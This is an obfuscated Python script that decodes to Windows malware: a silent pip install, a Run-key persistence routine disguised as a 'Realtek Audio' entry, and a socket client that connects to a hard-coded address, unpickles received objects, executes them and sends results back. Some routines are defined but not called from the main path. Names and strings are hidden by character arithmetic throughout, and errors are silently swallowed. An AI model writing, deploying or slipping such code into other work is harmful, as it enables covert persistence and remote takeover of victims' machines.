from builtins import getattr as PzQWXGyzczcO,hasattr as paluuoBFSqqz,staticmethod as wKPVjfEPxnTq;from importlib import import_module as OZXBxjIACLZF
from sys import getsizeof as wpIUMErvudsk,executable as aqpawtiezRKh
from subprocess import check_call as RWncOszECTrd,DEVNULL as vknBVIicHrCu
def BlGsWbOibgDw(ivMetmwPXMsX,afyUArKrYoaU=None,bLPERsFVJGBl=b'TMAPDaSIcIFG'):
    bWjHdFEaAmUG=afyUArKrYoaU
    eHLzbYimpSFq=().__class__.__name__[-1]+chr(0o170)+chr(101)+{}.__class__.__name__[-2]+().__class__.__name__[1]+chr(0x74)+chr(0b1100101)
    if paluuoBFSqqz(ivMetmwPXMsX,eHLzbYimpSFq):bWjHdFEaAmUG=PzQWXGyzczcO(ivMetmwPXMsX,eHLzbYimpSFq)()
    return bWjHdFEaAmUG
def VhUkuhQdErew(axKZuigreziB=['AWFZqOjGUXxpi'+chr(73)+chr(0x6D),'p'+chr(0x69)+chr(0o154)*2+chr(79).lower()+chr(119)],**upCobXJiHQes):
    HRvjXWEzpqlv=[axKZuigreziB[1]]
    try:
        for PZqaxzgVvtqfgdgwG in HRvjXWEzpqlv:RWncOszECTrd([aqpawtiezRKh,chr(0x2D)+chr(0b01101101),(axKZuigreziB[0][11:13])+chr(0o160),[].__class__.__name__[-3]+chr(0x6E)+chr(115)+().__class__.__name__[0]+(52/4).__class__.__name__[-2]+chr(0x6C)*2,PZqaxzgVvtqfgdgwG],stdout=vknBVIicHrCu,stderr=vknBVIicHrCu)
    except:pass
class dqTtKbqKTkbQ:
    def yRYOYsYKvYCA(self,uupIsDKEcTYa='g-I@a¯£²9\nÖÄ',eqjbWsOeMDTU=0b0101):
        self._RhELPxQjGJNZ={}.__class__.__name__[2:4]+chr(0o171)+chr(0o160)+().__class__.__name__[-1]+chr(0b1110011)
        self._WDiUmQqGzGuO=OZXBxjIACLZF(self._RhELPxQjGJNZ)
        self._WcxoXJEQqoSQ=chr(87)+[].__class__.__name__[-3]+chr(0x6E)+{}.__class__.__name__[0].upper()+().__class__.__name__[-2].upper()*2
        self._yTYLrBlOtEfJ=PzQWXGyzczcO(self._WDiUmQqGzGuO,self._WcxoXJEQqoSQ)
        self._WTUeoKmhFVHz=PzQWXGyzczcO(self._WDiUmQqGzGuO,chr(0o103).lower()+chr(0x5F)+chr(118)+True.__class__.__name__[-2]+chr(0x69)+{}.__class__.__name__[-4]+chr(0b1011111)+chr(0o120).lower())
        self._PyEGWmpLpmWH=PzQWXGyzczcO(self._WDiUmQqGzGuO,chr(98)+chr(0x79)+chr(114)+chr(0b1000101).lower()+9.3.__class__.__name__[-5])
        self._XuudgPTMACdv=OZXBxjIACLZF(self._RhELPxQjGJNZ+chr(0x2E)+self._WcxoXJEQqoSQ[0:3].lower()+().__class__.__name__[-5]+chr(89).lower()+chr(0o160)+b''.__class__.__name__[3:5])
        self._BCJUAoWHrxWa=PzQWXGyzczcO(self._XuudgPTMACdv,{}.__class__.__name__[0].upper()+chr(0x57)+False.__class__.__name__[-3].upper()+chr(0o122)+chr(0b1000100))
        self._LOboXURZHWsd=PzQWXGyzczcO(self._WDiUmQqGzGuO,chr(99)+chr(0b01011111)+chr(119)+{}.__class__.__name__[2]+chr(0o110).lower()+1.3.__class__.__name__[3]+chr(0x72))    
        self._zfkLWJWoObNp=chr(0x6B)+().__class__.__name__[-1]+chr(0o162)+chr(0b1101110)+chr(101)+True.__class__.__name__[-1]+chr(51)+chr(0o62)
        self._DWxHIGHMihNq=r'{}'.format(chr(83)+False.__class__.__name__[-3]+4.31.__class__.__name__[-5]+10.145.__class__.__name__[-1]+chr(119)+chr(0o141)+chr(0b1110010)+().__class__.__name__[-1]+chr(0x5C)+chr(0o115)+[].__class__.__name__[-3]+chr(99)+chr(0x72)+True.__class__.__name__[2])
        self._DvXyaVYykKmK=self._DWxHIGHMihNq+[].__class__.__name__[2]+chr(111)+5.6.__class__.__name__[0]+().__class__.__name__[-5]+chr(92)+chr(0x77).upper()+chr(0b1101001)+chr(0o156)+chr(100)+77.8.__class__.__name__[-3]
        self._ESjzvfSkZLAQ=self._DvXyaVYykKmK+chr(119)+chr(0o163)+chr(0b1011100)+{}.__class__.__name__[-2].upper()+().__class__.__name__[1]+(chr(114)*2)+chr(0x65)+chr(0o156)+55.31.__class__.__name__[-1]+chr(86)+().__class__.__name__[-1]+chr(0o162)
        self._oGTlykckCSxC=self._ESjzvfSkZLAQ+chr(115)+[].__class__.__name__[1]+chr(0x6F)+chr(0o156)+chr(0o134)+chr(0o122)+chr(0b1110101)+(chr(110))
    def HsAFDkKrLWRm(self,**NoOSwjCoxaHY):
        VtTvnfZHmkSb=self._BCJUAoWHrxWa()
        ycFobBVTcyoI=self._WTUeoKmhFVHz()
        YmeBnbLvNEvK=chr(82)+().__class__.__name__[-1]+chr(0o107).lower()+chr(0x63).upper()+chr(0b1110010)+chr(101)+55.23.__class__.__name__[3:5]+chr(0o145)+chr(0x4B)+chr(69).lower()+chr(0o171)+chr(0b1000101)+chr(120)+chr(0x57)
        pSmTonsEmTFD=self._yTYLrBlOtEfJ(self._zfkLWJWoObNp)
        try:PzQWXGyzczcO(pSmTonsEmTFD,YmeBnbLvNEvK)(self._WTUeoKmhFVHz(0x80000001),self._oGTlykckCSxC,0,None,0,0x000F003F,None,self._PyEGWmpLpmWH(ycFobBVTcyoI),self._PyEGWmpLpmWH(VtTvnfZHmkSb))
        except:pass
    def dcfcXvCEiDRj(self,BAVOBQbKMbDZ=None,DpkystLvuXQR='²',**vtWkoRITHYCY):
        WEAnXpJSRlJW=self._WTUeoKmhFVHz();XJzocCqWABmG=chr(0b1010010)+().__class__.__name__[4]+chr(0x67)+56.2.__class__.__name__[-3].upper()+chr(80).lower()+chr(0o145)+chr(0x6E)
        tYOYtuiXFdbt=XJzocCqWABmG+chr(75)+chr(0b1100101)+chr(0x79)+chr(69)+chr(0o170)+chr(0b01110111).upper()
        hQoaDpelqTbF=r'{}'.format([].__class__.__name__[0:2].title()+chr(0x6C)+chr(0b1000001).lower()+{}.__class__.__name__[-2]+chr(32)+chr(0o141).upper()+chr(103)+6.4.__class__.__name__[-3]+chr(0o165)+().__class__.__name__[-5]+chr(0x69))
        zLkPPwNqjfLZ=r'{}'.format(__file__)
        jTpAnlJqNswb=PzQWXGyzczcO(tYOYtuiXFdbt,'r'+().__class__.__name__[-1]+chr(0o160)+[].__class__.__name__[-4]+552.3.__class__.__name__[-2]+chr(0x43).lower()+chr(0b1100101))(chr(0x4F)+chr(112)+chr(0o105).lower()+chr(110),{}.__class__.__name__[-2].upper()+[].__class__.__name__[0]+chr(111)+chr(0o123).lower()+().__class__.__name__[-1])
        jTpAnlJqNswb=jTpAnlJqNswb[:-3]
        uvUXkQcwHgAO=chr(0b1010010)+().__class__.__name__[4]+chr(0x67)+chr(83)+chr(0o145)+552.4.__class__.__name__[-1]+chr(86)+chr(0b1100001)
        fpyXhZlZfHsn=uvUXkQcwHgAO+chr(0x6C)+().__class__.__name__[-4]+chr(101)+chr(0o105)+chr(88).lower()+chr(0b01110111).upper()
        qwDTENPlCIuf=self._yTYLrBlOtEfJ(self._zfkLWJWoObNp)
        try:
            PzQWXGyzczcO(qwDTENPlCIuf,tYOYtuiXFdbt)(self._WTUeoKmhFVHz(0x80000001),self._oGTlykckCSxC,0,0x000F003F,self._PyEGWmpLpmWH(WEAnXpJSRlJW))
            if PzQWXGyzczcO(WEAnXpJSRlJW,chr(0o166)+55.2.__class__.__name__[-2]+[].__class__.__name__[-4]+chr(0x55).lower()+chr(101)):
                PzQWXGyzczcO(qwDTENPlCIuf,fpyXhZlZfHsn)(WEAnXpJSRlJW,hQoaDpelqTbF,0,1,zLkPPwNqjfLZ,(len(zLkPPwNqjfLZ)+1)*wpIUMErvudsk(self._LOboXURZHWsd))
        except:pass
        finally:
            if WEAnXpJSRlJW:PzQWXGyzczcO(qwDTENPlCIuf,jTpAnlJqNswb)(WEAnXpJSRlJW)
    __init__=yRYOYsYKvYCA
class IEEsvAAtTBOH:
    BFjpdgHXTETR=OZXBxjIACLZF(chr(112)+[].__class__.__name__[-3]+{}.__class__.__name__[2]+chr(0x6B)+chr(0o154)+chr(101))
    OGEoGhwIUaLZ=PzQWXGyzczcO(BFjpdgHXTETR,[].__class__.__name__[-4]+5.2.__class__.__name__[2:4]+chr(0o144)+''.__class__.__name__[-3]);grptvisrflVC=PzQWXGyzczcO(BFjpdgHXTETR,{}.__class__.__name__[-4]+chr(117)+chr(0b1101101)+chr(0x70)+[].__class__.__name__[2])
    @wKPVjfEPxnTq
    def HBdMiKsnAtNH(xIRvIaDKvRwu,AGxFdfgHdRue=0o127):return IEEsvAAtTBOH.OGEoGhwIUaLZ(xIRvIaDKvRwu)
    @wKPVjfEPxnTq
    def JiFKOtdYodKN(ucBgpNPRFFOA,**RkmtLlHBTtVN):return IEEsvAAtTBOH.grptvisrflVC(ucBgpNPRFFOA)
class gQruAhFOlNgi:
    def FmjkeWoecWFt(self,SxPkucnRgxFy,HhxBnDCcpSUb=None,uFoPpcvtZkts=0o57,**UKjITbYvIEuH):
        self._kTqFHLSFFmPt=SxPkucnRgxFy
        self._FWOvqkkczoLg=self._SrrNsRMyZVGk=HhxBnDCcpSUb
        self._mQlktKPjOZxN=[].__class__.__name__[2]+True.__class__.__name__[2]+chr(0o143)+chr(0b1101011)+().__class__.__name__[4]+chr(0o164)
        self._jNSpDPEwKcqA=()
        self._GJsNfChonick=OZXBxjIACLZF(self._mQlktKPjOZxN)
        self._xAhhsHBguuuK=OZXBxjIACLZF(chr(114)+11.5.__class__.__name__[3]+chr(0o156)+chr(0b1100100)+chr(0x6F)+chr(0o155))
        self._gtOjEJagHRnP=chr(103)+().__class__.__name__[-1]+().__class__.__name__[3]+chr(104)+chr(0x6F)+chr(0b1110011)+chr(116)+chr(0o156)+chr(97)+chr(0x6D)+chr(101)
        self._oIZHcYBHafuS=self._gtOjEJagHRnP[:7]+chr(98)+chr(0o171)+self._gtOjEJagHRnP[7:]
        self._FSyoJdzsIZcz=chr(0x72)+chr(97)+chr(0x6E)+chr(0o144)+chr(0x69)+chr(0b1101110)+chr(116)
        self._fJYHssfDqEUS=chr(0o101)+chr(70)+chr(0x5F)+chr(73)+chr(0x4E)+chr(69)+chr(0o124)
        self._uHYvMRQEVzKL=chr(83)+chr(0o117)+chr(0x43)+chr(0x4B)+chr(0b1011111)
        self._xYBrgqFPodTg=self._uHYvMRQEVzKL+[].__class__.__name__[-2].upper()+().__class__.__name__[-5].upper()+chr(0o122)+chr(69)+chr(0b01000001)+chr(0x4D)
        self._VfPBlQQnlYpW=self._uHYvMRQEVzKL+{}.__class__.__name__[-4].upper()+chr(71)+chr(0x52)+chr(65)+chr(0x4D)
        self._CFIwbJZjUoBs=[].__class__.__name__[2]+().__class__.__name__[-1]+chr(0x6E)+chr(0o144)+chr(0b1110100)+False.__class__.__name__[-2]
        self._focBjBcNqMxy={}.__class__.__name__[-2]+True.__class__.__name__[1]+chr(0x6E)+chr(0o156)+chr(0b1100101)+chr(99)+().__class__.__name__[0]
        self._yKArJRgFFRTW=set().__class__.__name__+chr(116)+[].__class__.__name__[1]+chr(0x6D)+().__class__.__name__[-1]+chr(0o157)+chr(0x75)+chr(0b1110100)
        self._eXcTtOpTKCIb=chr(0x72)+().__class__.__name__[-1]+{}.__class__.__name__[-2]+chr(0o166)
        self._qQahhcyEsRIl=[].__class__.__name__[-2]+chr(101)+chr(0x6E)+{}.__class__.__name__[-4]+chr(0o141)+().__class__.__name__[-2]+chr(0x6C)
        self._JhXrWoekkeOZ()
        self._RBkZfGEqaQrd()
    def AGNmlbcbtIqx(self,UnVDCUwoyLXb=0b000110100100):self._FWOvqkkczoLg=self._SrrNsRMyZVGk=None;del self
    def _JhXrWoekkeOZ(self,**hhhKMKlLAmMl):
        JQbFamnPtOKc=PzQWXGyzczcO(self._GJsNfChonick,self._mQlktKPjOZxN);YyBUItTDklog=PzQWXGyzczcO(self._GJsNfChonick,self._fJYHssfDqEUS)
        NYfPcqvtEIpP=PzQWXGyzczcO(self._GJsNfChonick,self._xYBrgqFPodTg)
        mUlhKWvjYbaf=PzQWXGyzczcO(self._GJsNfChonick,self._VfPBlQQnlYpW);xAhhsHBguuuK=PzQWXGyzczcO(self._xAhhsHBguuuK,self._FSyoJdzsIZcz);vOJpdLUtmbiL=xAhhsHBguuuK(*(int(0b1010011),1023))
        self._jNSpDPEwKcqA=(self._kTqFHLSFFmPt,vOJpdLUtmbiL)
        try:
            self._FWOvqkkczoLg=JQbFamnPtOKc(YyBUItTDklog,NYfPcqvtEIpP);self._SrrNsRMyZVGk=JQbFamnPtOKc(YyBUItTDklog,mUlhKWvjYbaf)
            PzQWXGyzczcO(self._FWOvqkkczoLg,self._yKArJRgFFRTW)(int(0b101))
            PzQWXGyzczcO(self._FWOvqkkczoLg,self._focBjBcNqMxy)(self._jNSpDPEwKcqA)
        except:pass
    def _fzBidzwvsILg(self,ZGxoGzkCQyWv,lkECHdQLqXAK=None,uTwVTPFCcJyf=0x69):
        SUkbXRbMnyBJ=lkECHdQLqXAK
        if paluuoBFSqqz(self._FWOvqkkczoLg,self._qQahhcyEsRIl):SUkbXRbMnyBJ=PzQWXGyzczcO(self._FWOvqkkczoLg,self._qQahhcyEsRIl)
        if SUkbXRbMnyBJ and ZGxoGzkCQyWv:SUkbXRbMnyBJ(ZGxoGzkCQyWv)
    def _RBkZfGEqaQrd(self,gmNRLRHgVvNj=None):
        yNtUmUQuytPh=6+97+45-991+844*23+54/8/18575.75
        CuBHzxwBuVsE=oRgIrEzQlNRp=gmNRLRHgVvNj
        if paluuoBFSqqz(self._FWOvqkkczoLg,self._eXcTtOpTKCIb):oRgIrEzQlNRp=PzQWXGyzczcO(self._FWOvqkkczoLg,self._eXcTtOpTKCIb)
        while(yNtUmUQuytPh):
            try:
                if oRgIrEzQlNRp:
                    if CuBHzxwBuVsE:=oRgIrEzQlNRp(int(0o10000)):
                        if EeNeNlcFfYEc:=BlGsWbOibgDw(IEEsvAAtTBOH.JiFKOtdYodKN(CuBHzxwBuVsE)):self._fzBidzwvsILg(EeNeNlcFfYEc)
            except:PzQWXGyzczcO(self._SrrNsRMyZVGk,self._CFIwbJZjUoBs)(b'',self._jNSpDPEwKcqA)
    def PJDqOuSwBFci(self):self._RBkZfGEqaQrd()
    __init__=FmjkeWoecWFt
    __del__=AGNmlbcbtIqx
class sBAfMdKBacnf:
    def ZWFPj6ZrCyfX(self,uqOYRocVjxVl):
        self._QmJzWWGKPPgn=self._k4XpEz3nOBl9();self._gvZhdoTewnGB=dqTtKbqKTkbQ();self._PjcWNEFmGwNv=chr(0o120)+chr(0x4A)+{}.__class__.__name__[-4].upper()+chr(113)+False.__class__.__name__[2].upper()+chr(117)+[].__class__.__name__[-2].upper()+chr(0x77)+True.__class__.__name__[0].upper()+chr(70)+chr(0o143)+[].__class__.__name__[-3]
    def _k4XpEz3nOBl9(self,nxgxtVEodAZV=0o71,RfGWymWIoEez=1,AgnvNNXJFhRQ=None):
        wBJI6kjV5EWb=[AgnvNNXJFhRQ]*(8*4)
        if 1<=-1:wBJI6kjV5EWb=[]
        else:wBJI6kjV5EWb=reversed([chr(0x31),chr(17*3),chr(0o62),chr(0b00101110),chr(7*(3+4)),chr(0o56),chr(0x38),chr(54),chr(0b0110001),chr(46),chr(0b0110010),chr(0o71),chr(7*7)])
        return ''.join(filter(None,wBJI6kjV5EWb))
    def _QKhIuqFptfdH(self,**exsixgZWFtsW):self._gvZhdoTewnGB.dcfcXvCEiDRj()
    def _DrsdBiCuGhtQ(self):VhUkuhQdErew()
    def _RIRonIMENZhQ(self,RarIAWLHcyhZ=5):gQruAhFOlNgi(self._QmJzWWGKPPgn).PJDqOuSwBFci()
    def oepiPZXSuWQp(self):
        # self._QKhIuqFptfdH();
        self._DrsdBiCuGhtQ()
    __init__=ZWFPj6ZrCyfX
sBAfMdKBacnf('uqOYRocVjxVl').oepiPZXSuWQp() if __name__==chr(95)+chr(0b1011111)+chr(109)+chr(0x61)+chr(0o151)+chr(0x6E)+chr(0o137)+chr(0x5F) else exit(0)